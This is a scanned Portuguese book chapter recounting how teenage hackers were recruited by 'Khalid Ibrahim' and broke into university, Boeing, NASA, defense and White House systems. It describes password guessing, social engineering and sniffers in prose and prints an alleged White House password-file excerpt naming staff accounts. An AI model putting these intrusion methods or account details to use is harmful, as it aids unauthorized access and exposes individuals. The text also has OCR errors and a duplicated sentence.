grupo de hackers chamado gLobaLheLL; por meio desse grupo fez contato com um estudante de computaęao 
na uniyersidade e pediu-lhe alguns nomes de usuarios e senhas. A informaęao veio rapido — um hacker atras 
de outro, nao se fez nenhuma pergunta. neOh descobriu que a seguranęa de computadores na uniyersidade 
ficava entre temerosa e desleixada, o que era surpreendente para urna uniyersidade de tecnologia/engenharia, 
onde deveriam conhecer bem o assunto. A maioria dos alunos escolhia senhas identicas aos nomes de usuario 

— a mesma palavra ou ffase para os dois usos. 

Urna breve lista que o estudante fomeceu foi suficiente para dar acesso a neOh, permitindo que ele 
comeęasse a xeretar eletronicamente — sniffmg (farejando), na linguagem dos hackers. Isso revelou um aluno, 
a quem chamaremos de Chang, que estava acessando FTPs (sites de download) nos Estados Unidos. Entre 
esses FTPs havia um site warez*. Usando um truque-padrao de engenharia social, neOh navegou pela rede da 
faculdade para captar o linguajar falado no campus. Isso foi mais 


* Expressao que descreve a pirataria de software (N. da R. T.). 
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facil do que poderia parecer no inicio, visto que "a maioria deles fala ingles", diz neOh. Entao ele entrou em 
contato com Chang, contando uma historia que fez parecer que estava talando com ele do laboratório de ciencia 
da computaęao do campus. 

"Sou do Bloco 213", ele disse eletronicamente a Chang, e fez uma solicitaęao direta de nomes de alunos e 
endereęos eletrónicos, como qualquer estudante interessado em entrar em contato com os colegas de classe. 
Uma vez que a maioria das senhas era facil, entrar nos arquivos dos alunos foi moleza. 

Logo depois ele conseguiu entregar a Khalid informaędes do banco de dados sobre cem estudantes. "Eu lhe 
dei as informaędes e ele disse: 'Tenho tudo o que preciso'." Khalid estava satisfeito. Obviamente ele nao queria 
os nomes, só queria ver se neOh podia realmente obter informaęoes de uma fonte remota. "Foi ai que nosso 
relacionamento comeęou", resume neOh, "Eu era capaz de fazer o trabalho, ele sabia que eu podia fazer, entao 
comeęou a me passar outras coisas." 

Dizendo a neOh que ele receberia seus mil dólares pelo correio, Khalid comeęou a ligar do celular uma vez 
por semana, "geralmente enquanto estava dirigindo". A incumbencia seguinte era entrar nos sistemas de 
computaęao do Bhabha Atomie Research Center, na India. A pequena organizaęao estava rodando com uma 
estaęao de trabalho da Sun, que e um terreno familiar para todo hacker. neOh entrou com facilidade, mas 
descobriu que a maquina nao tinha nenhuma informaęao que interessasse e parecia estar isolada, nao conectada 
a nenhuma rede. Aparentemente, Khalid nao ficou aborrecido com o fracasso. 

Enquanto isso, o dinheiro pelo hack da universidade chinesa ainda nao tinha aparecido. Quando neOh 
perguntou, Khalid ficou chateado. "Voce nao recebeu?! Eu o enviei em dinheiro num cartao de aniversario!", 
ele insistiu. O golpe manjado: "Seu cheque esta na correspondencia". No entanto, neOh estava disposto a 
continuar aceitando tarefas. Por que? Hoje ele abaixa a cabeęa, introspectivo. 

Eu continuei porąue sou teimoso. Era realmente emocionante pensar que seria pago por isso. E 
pensava: M Talvez o dinheiro tenha sido realmente extraviado no correio, talvez ele me pague 
desta vez M , 

Nao sei por que continuei fazendo isso. Natureza compulsiva? Sede de dinheiro? Sede de poder? 
Posso citar yarias possibilidades. 

Ao mesmo tempo que Khalid dava atribuięoes a neOh, ele tambem navegava por sites do IRC para achar 
outros dispostos a participar. Comrade era um deles, embora receoso de aceitar pagamento. 

Eu entendia que ele estava pagando as pessoas, mas nunca quis dar minhas informaęoes para 
receber dinheiro. Imaginaya que o que eu estava fazendo era só espiar, mas, se comeęasse a 
receber dinheiro, me tornaria um yerdadeiro criminoso. Quando muito, conversaria com ele no 
IRC e lhe daria o nome de alguns hosts aqui e ali.. 

O reporter Niall McKay conversou com outro peixe que Khalid pegou em sua rede, um adolescente da 
Califómia que se intitulava Chameleon (e que hoje e co-fundador de uma bem-sucedida 
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empresa de seguranęa). A historia de McKay em Wired.com 1 e contada com muitos detalhes por neOh e 
Comrade. "Eu estava no IRC urna noite, ąuando esse cara disse que ąueria o software DEM. Eu nao tinha e só 
estava confundindo o cara", afirmou o hacker. Entao, Khalid foi ficando serio: "DEM" e o apelido da Defense 
Information Systems Network Eąuipment Manager, um software de rede usado por órgaos militares. O 
programa foi capturado pelo grupo de hackers Masters of Downloading e comentava-se que poderia ser obtido 
se voce pedisse a pessoa certa. Parece que ninguem sabe se Khalid chegou a pór as maos nele — ou, pelo 
menos, ninguem dizia. De tato, nao e certo que o software tivesse valor para ele, mas ele obviamente achava 
que sim. Khalid estava envolvido com universidades chinesas e coisas assim. 

"Ele tentou se inteirar do que os caras do grupo estavam fazendo". neOh nos contou. Antes de tudo 
terminar, Khalid iria seguir os hackers por um ano e meio, "nao como urna pessoa qualquer que aparecia de vez 
em quando, mas como alguem que aparecia regularmente. Ele estava la, e entendia-se que esse era um negócio 
dele". Por "negócio dele" neOh referia-se a invasao de sites militares ou sistemas de computaęao de empresas 
comerciais que trabalhavam em projetos militares. 

Khalid pediu a neOh para entrar em Lockheed Martin e obter os esquemas de certos sistemas de aeronaves 
que eles estavam fabricando para a Boeing. neOh conseguiu obter urna penetraęao limitada em Lockheed, 
"cerca de tres etapas na rede interna", mas nao conseguiu ir alem de dois servidores (em um nivel que o pessoal 
da seguranęa chama de "DMZ", terra de ninguem). Isso nao bastava para atravessar os firewalls que protegiam 
as informaęóes mais delicadas da corporaęao, e ele nao conseguiu localizar o dado que lhe pediram para 
procurar. De acordo com neOh: 

[Khalid] llcou irritado. O que ele disse foi basicamente; "Voce nao esta mais trabalhando para 
mim. Voce nao consegue fazer nada". Mas ai ele me acusou de esconder informaęao. Ele me 
acusou de estar guardando informaęao para mim. Entao ele disse: "Esąueęa a Lockheed Martin. 
Entre diretamente na Boeing". 

neOh descobriu que a Boeing "nao era tao segura, se voce quisesse mesmo entrar la". Ele entrou explorando 
urna vulnerabilidade conhecida de um sistema da Boeing exposto na Internet. Entao, instalando um s niffer, 
conseguiu escutar as escondidas todos os pacotes de dados que iam e vinham de um computador — um tipo de 
grampeador de computador. A partir dai, conseguiu captar senhas e e-mails nao criptografados. As informaęóes 
que acumulou dos e-mails revelaram inteligencia suficiente para entrar na rede interna. 

Descobri seis ou sete esąuemas para portas e o nariz dos Boeing 747 sendo passados por e-mails. 
Conexóes nao criptografadas. Nao e genial?! (E ele ri.) Khalid llcou extatico. Ele disse que iria me 
dar quatro mil dólares. Esse dinheiro nunca apareceu — bela surpresa. 

De fato, quatro mil dólares teriam sido um excelente pagamento pelas informaęóes. De acordo com o ex- 
executivo de seguranęa da Boeing, Don Boelling, esse hack poderia ter sido investido contra a empresa, como 
descrito. Mas teria sido perda de tempo: quando um modelo de aeronave 
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entra em servięo, todas as linhas aereas clientes recebem conjuntos completos de esąuemas. Nesse ponto, a 
informaęao ja nao e mais considerada confidencial; qualquer um que quiser pode te-la. "Eu ate vi um CD do 
esquema 747 sendo oferecido recentemente na eBay", disse Don. E claro que Khalid provavelmente nao sabia 
disso. E só dois anos mais tarde a naęao viria a descobrir que alguns terroristas tinham serias razoes para querer 
os esquemas dos principais avioes de transporte usados por linhas aereas norte-americanas. 

Alvo para hoje a noite: SIPRNET 

Com Comrade, Khalid nao se preocupou em fazer testes. Desde o inicio, o hacker disse que Khalid "só 
estava interessado na SIPRNET e nas Foręas Armadas". 

Na maior parte das vezes, ele nao era muito claro ąuanto ao que ąueria — só acesso a sites de 
governo e militares. Com exceęao da SIPRNET. Ele realmente ąueria informaęóes da SIPRNET. 

Nao e de admirar que Khalid estivesse ansioso; esse provavelmente tinha sido seu alvo o tempo todo. A 
SIPRNET e a parte da DISN, Defense Information System Network (Rede de Sistemas de Informaęóes de 
Defesa), que transmite mensagens confidenciais. Mais que isso, a SIPRNET (acrónimo de Secret Internet 
Protocol Router Network) e a essencia da capacidade de comando e controle das Foręas Armadas norte- 
americanas. 

neOh ja tinha recusado urna oferta de Khalid para ter acesso a SIPRNET: 

Ele ofereceu dois mil dólares. Eu recusei. Se eu entrasse na SIPRNET, os agentes federais 
bateriam a minha porta. Dois mil dólares nao yaliam uma baia na cabeęa. 

Quando Khalid falou com Comrade sobre a tarefa, o preęo subiu. "Ele disse que pagaria, se nao me engano, 
cerca de dez mil dólares pelo acesso", lembra-se Comrade, parecendo bem menos melindrado que neOh em 
aceitar o projeto, embora insistisse que era o desafio, e nao o dinheiro, que o tentava. 

Eu realmente cheguei muito perto da SIPRNET. Entrei no sistema de computaęao na Defense 
Information Security Agency, Disa. Aąuele computador era inteligente. Acho que possuia quatro 
processadores e, como dois mil usuarios tinham acesso a ele, o arquivo provedor Unix tinha perto 
de cinco mil hosts diferentes; metade deles usava contas privilegiadas; voce tinha de estar naąuele 
computador para acessa-lo — nao podia fazer isso de fora. 

Entretanto, como ele imaginou, seu palpite de que tinha tropeęado em alguma coisa importante estava 
certo. As missóes centrais da Disa incluem comando e controle conjuntos e computaęao de apoio ao combate 
— uma clara sobreposięao de funęóes da SIPRNET Mas os esforęos dele foram em vao. 
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Muito legał ter todo aąuele acesso, mas nunca tive tempo suficiente para mexer nele, para 

chegar a algum lugar. Eu fui pego tres ou ąuatro dias depois. 

Um momento de preocupaęao 

No Natal de 1999, neOh e Comrade levaram um tranco. O vóo IC-814 da Indian Airlines, em rota de 
Katmandu para Nova Deli, com 178 passageiros e 11 tripulantes, foi seąiiestrado. de acordo com as noticias, os 
seąiiestradores eram terroristas paąuistaneses associados ao Taliba. Terroristas 
como Khalid? 

Sob ordens dos seąuestradores, o Airbus A300 prosseguiu num ziguezague para o Oriente Medio e voltou, 
aterrissando rapidamente na India, no Paąuistao e nos Emirados Arabes, onde o corpo de um passageiro foi 
removido; era um jovem que voltava da lua-de-mel com a esposa. Ele foi esfaąueado ate a morte por ter se 
recusado a colocar urna venda nos olhos. 

O aviao acabou aterrissando em Kandahar, Afeganistao — o que aumentou a probabilidade de urna 
conexao com o Taliba. Os passageiros remanescentes e a tripulaęao foram mantidos a bordo durante oito dias 
repletos de terror e acabaram sendo soltos em troca da libertaęao de seis militantes. Um deles, Sheikh Umer, 
mais tarde ajudaria a fmanciar Mohammed Atta, lider dos ataques de 11 de setembro ao World Trade Center. 

Depois do seqiiestro, Khalid disser a neOh que o grupo dele era responsavel e que ele tambem estava 
envolvido no caso. 

Aąuilo me assustou demais. Ele era um cara mau- Eu senti que tinha de me proteger. 

Mas a angustia de neOh foi temperada com a ganancia de menino. "Eu ainda esperava que ele me pagasse", 
acrescentou. 

A conexao com o sequestro pós mais lenha na fogueira que Khalid tinha acendido antes. Em certo 
momento, aparentemente incomodado com a falta de sucesso dos adolescentes em fomecer as informaęoes que 
estava pedindo, Khalid tentou urna tatica de muita pressao. O reporter Niall McKay, na mesma reportagem para 
a Wired.com, afirmou ter visto urna antiga mensagem do IRC de Khalid para jovens, em que ele ameaęava 
mata-los se o delatassem para o FBI. McKay escreveu que ele tambem viu urna mensagem de paquistaneses 
para os garotos: "Quero saber: alguem contou as autoridades federais sobre mim?". E em outro lugar: "Diga a 
eles [se eles fizeram isso] que estao mortos. Eu vou arrumar uns atiradores para mata-los". 2 

Comrade cai na rede 

A situaęao estava problematica, mas ia piorar. Alguns dias depois de Comrade penetrar com sucesso num 
sistema associado a SIPRNET, o pai dele foi parado por guardas a caminho do trabalho. Eles lhe disseram: 
"Queremos conversar com seu filho", e lhe mostraram um mandado de busca. Comrade lembra-se: 
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Havia pessoas da Nasa. do DoD, do FBI. Ao todo, havia dez ou dozę agentes e guardas 
tambem. Estive mexendo em algumas caixas da Nasa, coloquei um sniffer em ns3.gtra.mil , 
só para selecionar as senhas. Mas, como efeito colateral, ele selecionou e-mails tambem. Eles 
me disseram que eu estava sendo acusado de grampo ilegal. E, com relaęao aos 
computadores da Nasa, fui acusado de violaęao de direitos autorais ou infraęao. E outras 
coisas. 

Um dia antes, um amigo disse: "Cara, vamos nos dar mai logo, logo". Ele estava só 
conjecturando. Imaginei: "E, ele tem razao". E limpei meu disco rlgido. 

Mas Comrade nao fez a limpeza completa. "Eu me esąueci dos antigos drives que estavam espalhados 
pela minha mesa." 

Eles me interrogaram. Eu admiti, disse: "Sinto muito, aqui esta o que fiz, e assim que se 
conserta isso, nao vou fazer mais isso". Eles titubearam: "Tudo bem, nao o consideramos 
um criminoso, mas nao faęa isso de novo. Se voce fizer de novo. saira algemado". Eles 
pegaram meus computadores, perifericos e os discos rlgidos de reserva e salram. 

Mais tarde, eles tentaram fazer Comrade lhes dizer a senha para seus discos rigidos criptografados. 
Ele nao disse, e os policiais afirmaram que sabiam como inyadir as senhas. Comrade sabia mais: ele tinha 
usado criptografia PGP e sua senha tinha "cerca de cem caracteres". No entanto, ele insiste que nao e 
dificil de lembrar — sao tres de suas citaęoes favoritas unidas. 

Comrade nao ouviu nada mais sobre eles durante seis meses. Entao, um dia, soube que o govemo iria 
divulgar as acusaęoes. Quando ele foi para julgamento, estava sendo condenado pelo que o promotor 
alegou ser o nao-funcionamento dos computadores da Nasa durante tres semanas e a interceptaęao de 
milhares de mensagens de e-mail dentro do Departamento de Defesa. 

(Como sei muito bem, o 'prejuizo' alegado pelos promotores e o perigo real as vezes sao coisas bem 
diferentes. Comrade fez download de software do Marshall Space Flight Center, da Nasa, em Alabama, 
usado no controle da temperatura e da umidade da International Space Station; o govemo afirmou que 
isso tinha foręado o nao-funcionamento, por tres semanas, de certos sistemas de computador. O ataque ao 
Departamento de Defesa oferecia um motivo mais concreto para preocupaęao: Comrade tinha entrado no 
sistema de computador da Defense Threat Reduction Agency e instalado urna back door, que garantia seu 
acesso a qualquer momento.) 

O govemo obviamente considerou o caso importante porque serviu de advertencia a outros hackers 
adolescentes e divulgou na imprensa grandę parte da condenaęao, alegando que ele era a pessoa mais 
jovem que fazia hacking condenada por crime federal. A procurador-geral Janet Reno emitiu urna 
sentenęa que dizia: "Este caso, que marca a primeira vez que um hacker juvenil ficara detido numa 
instalaęao penitenciaria, mostra que levamos a serio a inyasao a computadores e que estamos trabalhando 
com outras autoridades em obseryancia do cumprimento da lei, de modo a combater ofensivamente esse 
problema". 
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A juiza condenou Comrade a seis meses de prisao, seguidos por seis meses de sursis, a comeęar do fim do 
semestre escolar A mae de Comrade ainda estava viva na epoca. Ela contratou um novo advogado, pediu as 
pessoas que escrevessem cartas de apoio, conseguiu muitas e apresentou-as a juiza, o que Comrade chama de "um 
caso totalmente novo", e, incrivelmente, conseguiu reduzir a sentenęa para prisao domiciliar seguida de quatro 
anos de sursis. 

As vezes na vida nao aproveitamos ao maximo as oportunidades. "Cumpri a prisao domiciliar e estava 
passando pelo sursis. Varias coisas aconteceram, comecei a ir a muitas festas, e entao eles me mandaram para a 
reabilitaęao." Ao voltar da reabilitaęao, Comrade conseguiu emprego em urna empresa da Internet e comeęou o 
próprio negócio. Mas ele e o oficial encarregado de sua liberdade condicional nao estavam se entendendo, e 
Comrade acabou voltando para a prisao. Ele só tinha 16 anos e estava encarcerado por atos que cometeu aos 15. 

Nao ha só jovens no sistema federal. O lugar para onde ele foi mandado transformou-se num 'campo' (esta 
parece ser a palavra adequada) no Alabama, que abrigava apenas dez prisioneiros e que Comrade descreve como 
"mais parecido com urna escola — portas trancadas e muros com cerca eletrica, mas, fora isso, nao se parecia 
muito com urna prisao". Ele nem tinha de ir para a aula porque ja tinha terminado o fundamental. 

De volta a Miami e novamente em liberdade vigiada, Comrade recebeu urna lista de hackers com quem nao 
tinha permissao para falar. "A lista era com esse cara nao, esse cara tambem nao, e neOh." Apenas "neOh" — o 
govemo federal o conhecia só pelo codinome. "Eles nao tinham ideia de quem era ele. Se eu tinha acesso a duas 
centenas de coisas, ele tinha acesso a mil", diz Comrade. "neOh escorregava como sabao." Pelo que se sabe, a lei 
ainda nao conseguiu acusa-lo nem identificar o local onde esta. 

Iiwestigando Khalid 

Khalid seria o militante que afirmou ser ou apenas um farsante que atraia adolescentes? Ou talvez urna 
operaęao do FBI para verificar ate onde os jovens hackers estavam dispostos a chegar? As vezes, os hackers que 
tinham negócio com Khalid suspeitavam que ele nao fosse realmente militante. A ideia de fomecer informaęóes a 
um agente estrangeiro parece te-los incomodado muito menos do que a ideia de que o sujeito os estaria 
enganando. Comrade disse que ele "sempre quis saber o que (Khalid) era. Eu nao sabia se ele era agente federal 
ou se era real. Conversando com neOh e com ele, percebi que era honesto. Mas nunca aceitei dinheiro dele — 
aquela era urna barreira que eu nao queria atravessar", (Antes, na conversa, quando mencionou pela primeira vez a 
oferta de dez mil dólares de Khalid, ele pareceu impressionado com a soma. Ele realmente teria rejeitado o 
dinheiro se seus esforęos tivessem sido bem-sucedidos e se Khalid tivesse pago? Talvez o próprio Comrade nao 
quisesse saber a resposta.) 

neOh diz que Khalid "parecia absolutamente profissional", mas admite ter ficado em duvida se ele era mesmo 
militante. "O tempo todo em que conversei com ele pensava que fosse um bosta. Mas depois de pesquisar com 
amigos com quem ele estava ligado e obter outras informaęóes, real-mente achamos que fosse mesmo quem dizia 
ser." 

Outro hacker, SavecOre, encontrou alguem no IRC que dizia ter um tio no FBI que arranjou imunidade para 
um gmpo inteiro de hackers chamado MilwOrm. "Pensei que seria enviada urna mensagem para o FBI dizendo 
que nao eramos hostis", disse SavecOre ao jomalista McKay em urna 


£9 



A arte de inyadir 


entrevista por e-mail. "Entao, eu lhe dei meu numero de telefone. No dia seguinte, recebi um tele-fonema de um 
agente do FBI, mas ele tinha um sotaąue paąuistanes forte demais," 

"Ele disse que seu nome era Michael Gordon e que estava com o FBI em Washington, DC", SavecOre contou 
ao jomalista. "Percebi entao que era Khalid Ibrahim o tempo todo." Embora algumas pessoas desejassem saber se 
o suposto terrorista poderia ser um piano do FBI, SavecOre estava chegando a conclusao contraria: que o cara que 
dizia ser agente do FBI na verdade era o mesmo terrorista tentando descobrir se os meninos estavam dispostos a 
delata-lo. 

A ideia de que essa poderia ser urna operaęao do FBI nao parece se sustentar. Se o govemo federal quisesse 
descobrir do que esses garotos eram capazes e o que estavam dispostos a fazer, o dinheiro teria corrido solto. 
Quando o FBI acredita que urna situaęao e seria suficiente para montar urna operaęao, eles investem dinheiro 
nesse esforęo. Prometer mil dólares para neOh e nao pagar nao fazia sentido nenhum. 

Aparentemente, só um hacker recebeu dinheiro de Khalid: Chameleon. "Fui ate a caixa postał urna manha e 
havia um cheque de mil dólares com um numero para ligar em Boston", Chameleon declarou em um artigo da 
Wired News (4.11.1998). Khalid achou que ele tinha mapas das redes de computador do govemo; o cheque era o 
pagamento pelos mapas. Chameleon descontou o cheque. Duas semanas depois ele foi procurado pelo FBI e 
interrogado sobre o pagamento, levantando a interessante questao de como o govemo tinha conhecimento dos mil 
dólares. Isso foi antes de 11 de setembro, quando o FBI estava atento a crimes nacionais e prestando pouca 
atenęao a ameaęa terrorista. Chameleon admitiu ter recebido o dinheiro, mas insistiu com o jomalista da Wired 
News que ele nao tinha fomecido nenhum mapa de redes do govemo. 

Embora tenha confessado que aceitou o dinheiro de um terrorista estrangeiro, o que poderia ter feito com que 
fosse acusado de espionagem e condenado a urna sentenęa muito longa, nao foram registradas denuncias — o que 
aumentou o misterio. Talvez o govemo quisesse que se espalhassem pela comunidade de hackers comentarios de 
que fazer negócio com agentes estrangeiros poderia ser arriscado. Talvez o cheque nao fosse de Khalid, mas do 
FBI. 

Poucas pessoas conhecem a verdadeira identidade de Chameleon, e ele realmente quer mante-la em segredo. 
Queriamos conhecer a versao dele da historia. Ele se recusou a falar sobre a questao (e se esquivou, mencionando 
que achava que Khalid era agente federal e só estava se fazendo passar por terrorista). Se eu estivesse no lugar 
dele, provavelmente tambem nao iria querer dar entrevista sobre o assunto. 

O Harkat ul-Mujahideen 

Enquanto pesquisava nos logs da IRC, o reporter McKay descobriu que Khalid tinha dito urna vez aos jovens 
hackers que seria membro do Harkat-ul-ansar, 3 de acordo com a South Asia Intełłigence Review, "o Harkat-ul- 
ansar foi descrito pelos Estados Unidos como urna organizaęao terrorista em virtude de sua ligaęao com o 
terrorista saudita exilado Osama bin Faden, em 1997. Para evitar as repercussoes da proibięao dos Estados 
Unidos, o gmpo passou a ser denominado como Harkat ul-Mujahideen em 1998". 4 

O Departamento de Estado dos Estados Unidos fez repetidas advertencias sobre esse grupo. Um item 
do documento diz: "Os oficiais paąuistaneses disseram que um ataąue aereo dos Estados Uni- 

O Departamento de Estado dos Estados Unidos fez repetidas advertencias sobre esse gmpo. Um item do 
documento diz: "Os oficiais paquistaneses disseram que um ataque aereo dos Estados Unidos 
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em 23 de outubro [2001] matou 22 guerrilheiros paąuistaneses que estavam lutando ao lado do Taliba, 
perto de Kabul, Os mortos eram membros do Harkat-ul-Mujahidden... [que] tinha sido colocado na lista 
oficial de organizaęoes terroristas do Departamento do Estado, em 1995".(5) 

De fato, o Harkat e hoje um dos 36 grupos reconhecidos pelos Estados Unidos como organizaęao 
terrorista estrangeira. O govemo, em outras palavras, os considera os piores atores na face da Terra. 

Os jovens hackers, evidentemente, nao sabiam disso. Para eles, era tudo um jogo. 

Quanto a Khalid, um importante generał das Foręas Armadas indianas, ao tratar do assunto de 
seguranęa de informaęao, em abril de 2002, confirmou que Khalid era na verdade um terrorista e contou 
em urna entrevista sobre as ligaęoes de hackers com "Khalid Ibrahim, do Harkat-ul-ansar, com sede no 
Paquistao". 6 No entanto, o generał parecia preocupado com o fato de que o próprio Khalid nao estivesse 
no Paquistao, mas em seu pais, em Deli, India. 

Após 11 de setembro 

Alguns hackers manipulam e enganam. Eles enganam sistemas de computaęao, fazendo-os pensar que 
tern autorizaęao que na verdade roubaram; eles praticam engenharia social para manipular as pessoas a 
firn de atingir seus objetivos. Tudo isso significa que, quando voce fala com um hacker, precisa ouvi-lo 
cuidadosamente para perceber se o que ele esta dizendo, e do jeito que esta dizendo, sugere que se pode 
acreditar nele. As vezes voce nao tern certeza. 

Meu co-autor e eu nao tmhamos certeza sobre o que neOh nos disse a respeito de sua reaęao ao I 1 de 
setembro. Acreditamos apenas o suficiente para compartilhar isto: 

Voce sabe ąuanto eu chorei naąuele dia? Tinha certeza de que minha vida estava acabada. 

Isso foi acompanhado por urna curiosa risada nervosa — que significava o que? Nao sabiamos dizer. 

Pensar que talvez eu tivesse alguma coisa a ver com aquilo, Se eu tivesse entrado em 
Lockheed Martin ou na Boeing e conseguisse mais informaęoes, eles poderiam ter 
usado isso. Foi uma epoca ruim para mim e para os Estados Unidos. 

Chorei porque nunca pensei em denuncia-lo. Nao soube julgar bem. Esta e a razao 
por que ele me contratou para fazer todas essas coisas... 

Se eu tivesse pelo menos um dedinho no Trade Center.., [Esse pensamento] era 
absolutamente devastador, 

Na verdade, perdi tres amigos no World Trade Center, Nunca me senti tao mai. 

Muitos hackers sao adolescentes ou ate mais novos, Seriam novos demais para reconhecer o perigo 
potencial de responder a solicitaęoes de alguem que poderia representar uma ameaęa aos Estados Unidos? 
Pessoalmente, gostaria de acreditar que o 11 de setembro tomou os jovens norte- 
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americanos — mesmo os mais novos — desconfiados e imunes a manipulaęao de um terrorista. Apenas espero 
estar certo. 

A irwasao na Casa Branca 

A historia da seguranęa de computadores e, de certo modo, semelhante a historia da criptografia. Ha muito 
tempo os fabricantes de códigos tern concebido cifras que rotulam de 'in-violaveis\ Mesmo hoje, apesar de os 
computadores poderem criptografar prontamente urna mensagem usando um pad one-time* ou urna chave com 
centenas de caracteres, a maioria dos códigos ainda e violavel (A National Security Agency, organizaęao norte- 
americana que faz e viola códigos, gaba-se de inumeros dos maiores, mais rapidos e mais potentes computadores 
do mundo.) 

A seguranęa do computador e como um jogo constante de gato e rato, com especialistas em seguranęa de um 
lado e invasores de outro, O sistema operacional Windows contem linhas de código numeradas em dezenas de 
milhoes. Nao e dificil saber que qualquer software de tamanho consideravel contem, inevitavelmente, 
yulnerabilidades que os hackers dedicados um dia descobrirao. 

Enquanto isso, os funcionarios das empresas, os burocratas e ate os profissionais de seguranęa vao instalar um 
novo computador ou aplicativo e superyisionarao a etapa de mudanęa da senha, ou escolherao urna que seja só 
razoavelmente segura — deixando o dispositivo vulneravel. Se voce costuma ler noticias sobre ataques de hackers 
e inyasoes, sabe que sites das Foręas Armadas e do govemo, e ate o da Casa Branca, ja foram comprometidos. Em 
alguns casos, repetidamente. 

Entrar num site e 'desfigurar' urna pagina Web e urna coisa — na maior parte das vezes e algo trivial; quando 
muito, um incómodo. Alem disso, muitas pessoas tern urna unica senha para tudo; se a entrada num site permite a 
captura de senhas, os atacantes poderiam estar em posięao de conseguir acesso a outros sistemas na rede e de 
fazer muito mais estrago. neOh diz que em 1999 ele e dois outros membros do grupo de hackers gLobaLheLL 
Użeram exatamente isso em um dos pontos mais importantes dos Estados Unidos: a Casa Branca. 

Acho que a Casa Branca estava reinstalando seu sistema operacional. Eles tinham tudo 
padronizado. E em cerca de dez, quinze minutos, Zyklon e MostFearD conseguiram entrar, obter o 
arquivo shadowed** da senha, penetrar, entrar nele e mudar o site Web. Eu estava la enquanto 
eles estayam fazendo isso, 

Basicamente, e estar no lugar certo na hora certa. Foi só por acaso, apenas uma coincidencia feliz 
estar on-line bem na hora em que estayam mexendo no site. Tmhamos discutido essas coisas na sala 
de chat da gLobaLheLL. Acordei com o telefone tocando perto das tres da madrugada, com alguem 
dizendo que eles estayam fazendo isso. Eu disse; "Papo furado. Prove". Corri para o meu 
computador. E claro; eles estayam mesmo. 

* Metodo criptografico teoricamente inquebravel (N. da R. T). 

** Criptografado (N. da R. T.). 
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MostFearD e Zyklon fizeram a maior parte. Eles me deram o arquivo shadow para invadir o 
mais rapido que pudesse, Peguei uma [senha] — uma simples palavra do dicionario. Foi 
assim. 

neOh fomeceu uma parte do que diz ser o arquivo da senha que os outros obtiveram e passaram para ele, 
listando o que parecia ser alguns usuarios autorizados no staff da Casa Branca:(7) 


root:x:0:1:Super-User:/:/sbin/sh 

daemon:x:1:1::/: bin:x:2:2::/usr/bin: 

sys:x:3:3::/: 

adm:x:4:4:Admin:/var/adm: 

uucp:x:5:5:uucp Admin:/usr/lib/uucp: 

nuucp:x:9:9:uucp 

Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico 

ISten:x:37:4:Network Admin:/usr/net/nls: 

nobody:x:60001:60001:Nobody:/: 

noaccess:x:60002:60002:No Access User:/: 

nobody4:x:65534:65534:SunOS 4.x Nobody:/: 

bing:x:1001:10:Bing Feraren:/usr/users/bing:/bin/sh 

orion:x:1002:10:Christopher 

Adams:/usr/users/orion:/usr/ace/sdshell 

webadm:x:1130:101:Web 

Administrator:/usr/users/webadm:/bin/sh 

cadams:x:1003:10:Christopher 

Adams:/usr/users/cadams:/usr/ace/sdshell 

bartho_m:x:1004:101:Mark 

Bartholomew:/usr/users/bartho_m:/usr/ace/sdshell 
monty:x:1139:101 :Monty Haymes:/usr/users/monty:/bin/sh 
debra:x:1148:101 :Debra Reid:/usr/users/debra:/bin/sh 
connie:x:1149:101 :Cormie 
Colabatistto:/usr/users/cormie:/bin/sh 
bill:x:1005:101:William Hadley:/usr/users/bill:/bin/sh 


A lista esta na forma de um arquivo de senha Unix ou Linux, o tipo usado quando senhas 
criptografadas sao armazenadas em um arquivo separado, protegido. Cada linha contem o nome de uma 
pessoa que tern uma conta no sistema. A entrada "sdshell, em algumas linhas, sugere que esses usuarios, 
por seguranęa adicional, estavam carregando um pequeno dispositivo eletrónico chamado RSA SecurelD, 
que exibe um numero de seis digitos que muda a cada sessenta segundos. Para se conectar, esses usuarios 
devem entrar com o numero de seis digitos exibido naquele momento no dispositivo SecurelD, 
juntamente com um numero PIN (que pode ser atribuido, em algumas empresas, ou escolhido pelo 
próprio usuario, em outras). O site Web da Casa Branca foi desfigurado enquanto era invadido para 
mostrar que eles estiveram la, de acordo com neOh, que fomeceu um link ao defacement* (Figura 2.1).(8) 
Alem de levar o simbolo do gmpo de hackers gLobaLheLL, a 

* Desfiguramento. Ato praticado por hackers que consiste em descaracterizar a pagina de um site (N. da R. T). 
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Figura 2.1: Pagina 'desfigurada' no site Web da Casa Branca. 
maio de 1999. 


mensagem tambem inclui um logotipo do Danger Duo, de Hong Kong, que neOh diz ser um nome falso 
inventado para adicionar um elemento para enganar. 

Como neOh lembra, os responsaveis por essa invasao na Casa Branca nao sentiram nenhuma euforia em 
invadir o que deveria estar entre meia duzia ou urna duzia dos sites Web mais seguros da naęao. Eles estavam 
"muito ocupados tentando invadir tudo", explicou neOh, "para provar ao mundo que eram os melhores". Em vez 
dos tapinhas virtuais nas costas, diz ele, foi mais urna atitude do tipo: "Bom trabalho, garotos, finalmente 
conseguimos. Qual sera o próximo?" 

.Mas eles nao tinham muito tempo para outras invasoes de nenhum tipo. O mundo deles estava prestes a 
desabar, e aquela parte da historia traz de volta, mais urna vez, o misterioso Khalid. 

Zyklon, conhecido como Erie Burns, assume a narrativa a partir deste ponto. Ele nunca foi realmente 
membro do gLobaLheLL diz ele, mas ficava no IRC com alguns caras. Em sua descrięao dos acontecimentos, 
a invasao da Casa Branca foi possivel quando ele descobriu que o site Web era suscetivel a 
comprometimentos, explorando-se um buraco num programa de amostra chamado PHF, usado para acessar o 
banco de dados de urna lista telefónica baseada na Web. Essa era urna vulnerabilidade crftica, mas, embora 
as pessoas da comunidade hacker soubessem disso, "ela nao estava sendo usada por muita gente", diz 
Zyklon. 

Executando varios passos (detalhados na seęao "Insight", no finał deste capitulo), ele foi capaz de efetuar 
o login no whitehouse.gov e conseguir acesso a outros sistemas na rede local, inclusive o servidor do correio 
eletrónico da Casa Branca. Zyklon, nesse ponto, era capaz de interceptar qualquer mensagem entre os 
funcionarios da Casa Branca e o publico, embora, evidentemente, essas mensagens nao revelassem 
informaęao confidencial. 
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Mas ele tambem foi capaz, diz Zyklon, de "pegar uma cópia da senha a dos arquivos shadow". Eles 
navegaram pelo site, vendo o que podiam descobrir, esperando que as pessoas comeęassem a chegar ao trabalho. 
Enquanto aguardava, ele recebeu uma mensagem de Khalid informando que estava escrevendo um artigo sobre 
